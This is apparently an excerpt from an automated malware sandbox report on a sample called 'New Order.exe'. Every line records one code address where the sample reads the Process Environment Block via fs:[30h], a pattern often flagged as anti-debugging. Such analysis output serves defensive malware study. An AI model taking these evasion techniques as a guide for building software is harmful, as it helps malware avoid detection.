                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A2000 mov eax, dword ptr fs:[00000030h]8_2_018A2000
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A2000 mov eax, dword ptr fs:[00000030h]8_2_018A2000
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FC0F0 mov eax, dword ptr fs:[00000030h]8_2_017FC0F0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181E016 mov eax, dword ptr fs:[00000030h]8_2_0181E016
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181E016 mov eax, dword ptr fs:[00000030h]8_2_0181E016
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181E016 mov eax, dword ptr fs:[00000030h]8_2_0181E016
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181E016 mov eax, dword ptr fs:[00000030h]8_2_0181E016
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FA0E3 mov ecx, dword ptr fs:[00000030h]8_2_017FA0E3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01896030 mov eax, dword ptr fs:[00000030h]8_2_01896030
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01802050 mov eax, dword ptr fs:[00000030h]8_2_01802050
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886050 mov eax, dword ptr fs:[00000030h]8_2_01886050
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182C073 mov eax, dword ptr fs:[00000030h]8_2_0182C073
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182438F mov eax, dword ptr fs:[00000030h]8_2_0182438F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182438F mov eax, dword ptr fs:[00000030h]8_2_0182438F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A3C0 mov eax, dword ptr fs:[00000030h]8_2_0180A3C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A3C0 mov eax, dword ptr fs:[00000030h]8_2_0180A3C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A3C0 mov eax, dword ptr fs:[00000030h]8_2_0180A3C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A3C0 mov eax, dword ptr fs:[00000030h]8_2_0180A3C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A3C0 mov eax, dword ptr fs:[00000030h]8_2_0180A3C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A3C0 mov eax, dword ptr fs:[00000030h]8_2_0180A3C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018083C0 mov eax, dword ptr fs:[00000030h]8_2_018083C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018083C0 mov eax, dword ptr fs:[00000030h]8_2_018083C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018083C0 mov eax, dword ptr fs:[00000030h]8_2_018083C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018083C0 mov eax, dword ptr fs:[00000030h]8_2_018083C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BC3CD mov eax, dword ptr fs:[00000030h]8_2_018BC3CD
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018863C0 mov eax, dword ptr fs:[00000030h]8_2_018863C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE3DB mov eax, dword ptr fs:[00000030h]8_2_018AE3DB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE3DB mov eax, dword ptr fs:[00000030h]8_2_018AE3DB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE3DB mov ecx, dword ptr fs:[00000030h]8_2_018AE3DB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AE3DB mov eax, dword ptr fs:[00000030h]8_2_018AE3DB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A43D4 mov eax, dword ptr fs:[00000030h]8_2_018A43D4
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A43D4 mov eax, dword ptr fs:[00000030h]8_2_018A43D4
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018103E9 mov eax, dword ptr fs:[00000030h]8_2_018103E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018103E9 mov eax, dword ptr fs:[00000030h]8_2_018103E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018103E9 mov eax, dword ptr fs:[00000030h]8_2_018103E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018103E9 mov eax, dword ptr fs:[00000030h]8_2_018103E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018103E9 mov eax, dword ptr fs:[00000030h]8_2_018103E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018103E9 mov eax, dword ptr fs:[00000030h]8_2_018103E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018103E9 mov eax, dword ptr fs:[00000030h]8_2_018103E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018103E9 mov eax, dword ptr fs:[00000030h]8_2_018103E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FC310 mov ecx, dword ptr fs:[00000030h]8_2_017FC310
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181E3F0 mov eax, dword ptr fs:[00000030h]8_2_0181E3F0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181E3F0 mov eax, dword ptr fs:[00000030h]8_2_0181E3F0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181E3F0 mov eax, dword ptr fs:[00000030h]8_2_0181E3F0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018363FF mov eax, dword ptr fs:[00000030h]8_2_018363FF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A30B mov eax, dword ptr fs:[00000030h]8_2_0183A30B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A30B mov eax, dword ptr fs:[00000030h]8_2_0183A30B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A30B mov eax, dword ptr fs:[00000030h]8_2_0183A30B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01820310 mov ecx, dword ptr fs:[00000030h]8_2_01820310
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov ecx, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A8350 mov ecx, dword ptr fs:[00000030h]8_2_018A8350
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CA352 mov eax, dword ptr fs:[00000030h]8_2_018CA352
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F8397 mov eax, dword ptr fs:[00000030h]8_2_017F8397
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F8397 mov eax, dword ptr fs:[00000030h]8_2_017F8397
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F8397 mov eax, dword ptr fs:[00000030h]8_2_017F8397
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A437C mov eax, dword ptr fs:[00000030h]8_2_018A437C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE388 mov eax, dword ptr fs:[00000030h]8_2_017FE388
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE388 mov eax, dword ptr fs:[00000030h]8_2_017FE388
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE388 mov eax, dword ptr fs:[00000030h]8_2_017FE388
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E284 mov eax, dword ptr fs:[00000030h]8_2_0183E284
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E284 mov eax, dword ptr fs:[00000030h]8_2_0183E284
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01880283 mov eax, dword ptr fs:[00000030h]8_2_01880283
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01880283 mov eax, dword ptr fs:[00000030h]8_2_01880283
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01880283 mov eax, dword ptr fs:[00000030h]8_2_01880283
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F826B mov eax, dword ptr fs:[00000030h]8_2_017F826B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov ecx, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FA250 mov eax, dword ptr fs:[00000030h]8_2_017FA250
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F823B mov eax, dword ptr fs:[00000030h]8_2_017F823B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018102E1 mov eax, dword ptr fs:[00000030h]8_2_018102E1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018102E1 mov eax, dword ptr fs:[00000030h]8_2_018102E1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018102E1 mov eax, dword ptr fs:[00000030h]8_2_018102E1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01888243 mov eax, dword ptr fs:[00000030h]8_2_01888243
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01888243 mov ecx, dword ptr fs:[00000030h]8_2_01888243
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806259 mov eax, dword ptr fs:[00000030h]8_2_01806259
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BA250 mov eax, dword ptr fs:[00000030h]8_2_018BA250
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BA250 mov eax, dword ptr fs:[00000030h]8_2_018BA250
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804260 mov eax, dword ptr fs:[00000030h]8_2_01804260
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804260 mov eax, dword ptr fs:[00000030h]8_2_01804260
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804260 mov eax, dword ptr fs:[00000030h]8_2_01804260
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01802582 mov eax, dword ptr fs:[00000030h]8_2_01802582
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01802582 mov ecx, dword ptr fs:[00000030h]8_2_01802582
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01834588 mov eax, dword ptr fs:[00000030h]8_2_01834588
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E59C mov eax, dword ptr fs:[00000030h]8_2_0183E59C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018805A7 mov eax, dword ptr fs:[00000030h]8_2_018805A7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018805A7 mov eax, dword ptr fs:[00000030h]8_2_018805A7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018805A7 mov eax, dword ptr fs:[00000030h]8_2_018805A7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018245B1 mov eax, dword ptr fs:[00000030h]8_2_018245B1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018245B1 mov eax, dword ptr fs:[00000030h]8_2_018245B1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E5CF mov eax, dword ptr fs:[00000030h]8_2_0183E5CF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E5CF mov eax, dword ptr fs:[00000030h]8_2_0183E5CF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018065D0 mov eax, dword ptr fs:[00000030h]8_2_018065D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A5D0 mov eax, dword ptr fs:[00000030h]8_2_0183A5D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A5D0 mov eax, dword ptr fs:[00000030h]8_2_0183A5D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018025E0 mov eax, dword ptr fs:[00000030h]8_2_018025E0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C5ED mov eax, dword ptr fs:[00000030h]8_2_0183C5ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C5ED mov eax, dword ptr fs:[00000030h]8_2_0183C5ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01896500 mov eax, dword ptr fs:[00000030h]8_2_01896500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808550 mov eax, dword ptr fs:[00000030h]8_2_01808550
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808550 mov eax, dword ptr fs:[00000030h]8_2_01808550
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183656A mov eax, dword ptr fs:[00000030h]8_2_0183656A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183656A mov eax, dword ptr fs:[00000030h]8_2_0183656A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183656A mov eax, dword ptr fs:[00000030h]8_2_0183656A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BA49A mov eax, dword ptr fs:[00000030h]8_2_018BA49A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F645D mov eax, dword ptr fs:[00000030h]8_2_017F645D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018064AB mov eax, dword ptr fs:[00000030h]8_2_018064AB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018344B0 mov ecx, dword ptr fs:[00000030h]8_2_018344B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188A4B0 mov eax, dword ptr fs:[00000030h]8_2_0188A4B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FC427 mov eax, dword ptr fs:[00000030h]8_2_017FC427
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE420 mov eax, dword ptr fs:[00000030h]8_2_017FE420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE420 mov eax, dword ptr fs:[00000030h]8_2_017FE420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE420 mov eax, dword ptr fs:[00000030h]8_2_017FE420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018004E5 mov ecx, dword ptr fs:[00000030h]8_2_018004E5
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01838402 mov eax, dword ptr fs:[00000030h]8_2_01838402
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01838402 mov eax, dword ptr fs:[00000030h]8_2_01838402
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01838402 mov eax, dword ptr fs:[00000030h]8_2_01838402
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A430 mov eax, dword ptr fs:[00000030h]8_2_0183A430
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182245A mov eax, dword ptr fs:[00000030h]8_2_0182245A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BA456 mov eax, dword ptr fs:[00000030h]8_2_018BA456
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188C460 mov ecx, dword ptr fs:[00000030h]8_2_0188C460
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182A470 mov eax, dword ptr fs:[00000030h]8_2_0182A470
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182A470 mov eax, dword ptr fs:[00000030h]8_2_0182A470
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182A470 mov eax, dword ptr fs:[00000030h]8_2_0182A470
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A678E mov eax, dword ptr fs:[00000030h]8_2_018A678E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B47A0 mov eax, dword ptr fs:[00000030h]8_2_018B47A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018007AF mov eax, dword ptr fs:[00000030h]8_2_018007AF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180C7C0 mov eax, dword ptr fs:[00000030h]8_2_0180C7C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018807C3 mov eax, dword ptr fs:[00000030h]8_2_018807C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188E7E1 mov eax, dword ptr fs:[00000030h]8_2_0188E7E1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018227ED mov eax, dword ptr fs:[00000030h]8_2_018227ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018227ED mov eax, dword ptr fs:[00000030h]8_2_018227ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018227ED mov eax, dword ptr fs:[00000030h]8_2_018227ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018047FB mov eax, dword ptr fs:[00000030h]8_2_018047FB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018047FB mov eax, dword ptr fs:[00000030h]8_2_018047FB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C700 mov eax, dword ptr fs:[00000030h]8_2_0183C700
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800710 mov eax, dword ptr fs:[00000030h]8_2_01800710
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01830710 mov eax, dword ptr fs:[00000030h]8_2_01830710
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C720 mov eax, dword ptr fs:[00000030h]8_2_0183C720
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C720 mov eax, dword ptr fs:[00000030h]8_2_0183C720
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187C730 mov eax, dword ptr fs:[00000030h]8_2_0187C730
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183273C mov eax, dword ptr fs:[00000030h]8_2_0183273C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183273C mov ecx, dword ptr fs:[00000030h]8_2_0183273C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183273C mov eax, dword ptr fs:[00000030h]8_2_0183273C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183674D mov esi, dword ptr fs:[00000030h]8_2_0183674D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183674D mov eax, dword ptr fs:[00000030h]8_2_0183674D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183674D mov eax, dword ptr fs:[00000030h]8_2_0183674D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800750 mov eax, dword ptr fs:[00000030h]8_2_01800750
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842750 mov eax, dword ptr fs:[00000030h]8_2_01842750
